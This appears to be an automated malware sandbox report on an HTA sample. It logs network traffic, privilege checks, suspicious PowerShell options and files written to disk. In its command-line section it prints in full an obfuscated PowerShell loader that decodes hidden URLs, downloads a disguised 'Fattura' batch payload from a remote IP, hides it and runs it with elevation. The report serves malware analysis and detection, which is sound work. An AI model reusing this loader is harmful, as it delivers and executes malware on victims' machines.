yZEvC7tGMTC8QA56/1eAJadct4y/UgEaar6iV0Gq2aU732eB6w4H5UG042UtnXc95AuW2vKadETuLF1KKs4kV4BTuTLg92lRgIPTi28YBEFoMDtLXNcjf+M7voAyFOk9CcHt+cse6r6W4wvY0aBXQbw7FxexVwJ0Sd99asz2FxpP06KdFUmw1ebOCrVDmRpubw9M9ez3MZxSyprCHnH5rlhdvZ/8goyRyAaGLjxamgYdvxrs29BZWoOb9gZjCokx0IZu1LYuPKMVOgi8Byk9NQTR1wy4ehlcMPsSflGRVho+G1smQrL7EAtCGSQ+JtKw0FhsnlQOwuetEjr8pEnhwkNSGalPSbT1u0YOEztCISuC6YI8J0HbPHotgVjqN/4p43jnOwqs3gkYIecCoySyLI8BWchMOF1E0rlFvzcKWqJjbQG19+rKl03/qE4msbP2NKDbAEDGYZfR/SukOCZw/Y9Er8LozwAxofrCOJ5huygYjiOh3BTClCe2BVGqHR0y3GFgom6x+GmDlFGmgnyv2OOzfDPm7fcZjH+SvVibd8xsUGPgDQu9sEIZwj5gzOJNxQwvjl4lJ6QUag2T9JDQY0neQ7UGSQNUZY07xegpivvNSNjo3CYfje0sP7Kd8JY1ZWGFqxsjluPjdwRUUTg7CGRZnH/BPdg+zeDKeTPEZ
Data received	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
Data received	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

Poweshell is sending data to a remote host (5 events)

Data sent	kgcá 08\|Z1¹j-ô.sõ¿{Ùä¢í÷Ït=Ã?/5 ÀÀÀ À 28&ÿ i.ibb.co
Data sent	kgcá #I¥HCÍï>e\u óÄ£T¨/5 ÀÀÀ À 28&ÿ i.ibb.co
Data sent	GET /1/Fattura_IT9032003.bat HTTP/1.1 Host: 116.203.19.97 Connection: Keep-Alive
Data sent	micá üüê¸Ä2²ùMb¾CÞð[÷]N²§`/5 ÀÀÀ À 28(ÿ github.com
Data sent	micá Çg3 y¸SÁx`ñS,ª_p8ºÿ/5 ÀÀÀ À 28(ÿ github.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Dec. 7, 2022, 9:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Dec. 7, 2022, 9:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Dec. 7, 2022, 9:40 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	attrib +s +h Fattura_IT9032003.bat.exe
cmdline	attrib -s -h Fattura_IT9032003.bat.exe
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EVB }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__};function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,5882,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $VVOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882,5882,5830,5883,5895,5831,5836,5900,5902,5840,5836,5898,5859,5831,5889,5893,5881,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$IfJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){RwI $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,5833,5833,5838,5830,5834,5832,5835,5830,5833,5841,5830,5841,5839,5831,5833,5831,5854,5881,5900,5900,5901,5898,5881,5879,5857,5868,5841,5832,5835,5834,5832,5832,5835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDAhOV;;;}QCr;
cmdline	powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\ProgramData\Fattura_IT9032003.bat"' -ArgumentList 'am_admin'"
cmdline	xcopy "C:\Program Files\NETFramework\start.exe" Fattura_IT9032003.bat.exe /y
cmdline	C:\ProgramData\Fattura_IT9032003.bat am_admin
cmdline	powershell.exe -ExecutionPolicy UnRestricted function neH($EVB, $XkX){[IO.File]::WriteAllBytes($EVB, $XkX)};function RwI($EVB){if($EVB.EndsWith((qQr @(5830,5884,5892,5892))) -eq $True){rundll32.exe $EVB }elseif($EVB.EndsWith((qQr @(5830,5896,5899,5833))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EVB}elseif($EVB.EndsWith((qQr @(5830,5893,5899,5889))) -eq $True){misexec /qn /i $EVB}else{Start-Process $EVB}};function FYF($neH){$oKw=(qQr @(5856,5889,5884,5884,5885,5894));$fMO=(Get-ChildItem $neH -Force);$fMO.Attributes=$fMO.Attributes -bor ([IO.FileAttributes]$oKw).value__};function kME($eoN){$kYq = New-Object (qQr @(5862,5885,5900,5830,5871,5885,5882,5851,5892,5889,5885,5894,5900));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XkX = $kYq.DownloadData($eoN);return $XkX};function qQr($Yfu){$LIz=5784;$WDo=$Null;foreach($NrK in $Yfu){$WDo+=[char]($NrK-$LIz)};return $WDo};function QCr(){$DqQ = $env:ProgramData + '\';$RgpGMb = $DqQ + 'image.png';If(Test-Path -Path $RgpGMb){Invoke-Item $RgpGMb;}Else{ $VVOBCF = kME (qQr @(5888,5900,5900,5896,5899,5842,5831,5831,5889,5830,5889,5882,5882,5830,5883,5895,5831,5836,5900,5902,5840,5836,5898,5859,5831,5889,5893,5881,5887,5885,5830,5896,5894,5887));neH $RgpGMb $VVOBCF;Invoke-Item $RgpGMb;};;;$IfJAdDAhOV = $DqQ + 'Fattura_IT9032003.bat'; if (Test-Path -Path $IfJAdDAhOV){RwI $IfJAdDAhOV;}Else{ $dIxLH = kME (qQr @(5888,5900,5900,5896,5842,5831,5831,5833,5833,5838,5830,5834,5832,5835,5830,5833,5841,5830,5841,5839,5831,5833,5831,5854,5881,5900,5900,5901,5898,5881,5879,5857,5868,5841,5832,5835,5834,5832,5832,5835,5830,5882,5881,5900));neH $IfJAdDAhOV $dIxLH;RwI $IfJAdDAhOV;};FYF $IfJAdDAhOV;;;}QCr;

Communicates with host for which no DNS query was performed (1 event)

host

116.203.19.97

Drops a binary and executes it (1 event)

file	C:\ProgramData\Fattura_IT9032003.bat

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (5 events)

Time & API	Arguments	Status	Return
send Dec. 7, 2022, 9:40 a.m.	buffer: kgcá 08\|Z1¹j-ô.sõ¿{Ùä¢í÷Ït=Ã?/5 ÀÀÀ À 28&ÿ i.ibb.co socket: 1424 sent: 112	1	112
send Dec. 7, 2022, 9:40 a.m.	buffer: kgcá #I¥HCÍï>e\u óÄ£T¨/5 ÀÀÀ À 28&ÿ i.ibb.co socket: 1424 sent: 112	1	112
send Dec. 7, 2022, 9:40 a.m.	buffer: GET /1/Fattura_IT9032003.bat HTTP/1.1 Host: 116.203.19.97 Connection: Keep-Alive socket: 904 sent: 86	1	86
send Dec. 7, 2022, 9:40 a.m.	buffer: micá üüê¸Ä2²ùMb¾CÞð[÷]N²§`/5 ÀÀÀ À 28(ÿ github.com socket: 1416 sent: 114	1	114
send Dec. 7, 2022, 9:40 a.m.	buffer: micá Çg3 y¸SÁx`ñS,ª_p8ºÿ/5 ÀÀÀ À 28(ÿ github.com socket: 1416 sent: 114	1	114

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	C:\ProgramData\Fattura_IT9032003.bat am_admin
parent_process	powershell.exe	martian_process	"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\Fattura_IT9032003.bat" am_admin
parent_process	powershell.exe	martian_process	C:\ProgramData\Fattura_IT9032003.bat
parent_process	powershell.exe	martian_process	"C:\ProgramData\Fattura_IT9032003.bat"

Creates a suspicious Powershell process (6 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

lib32.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All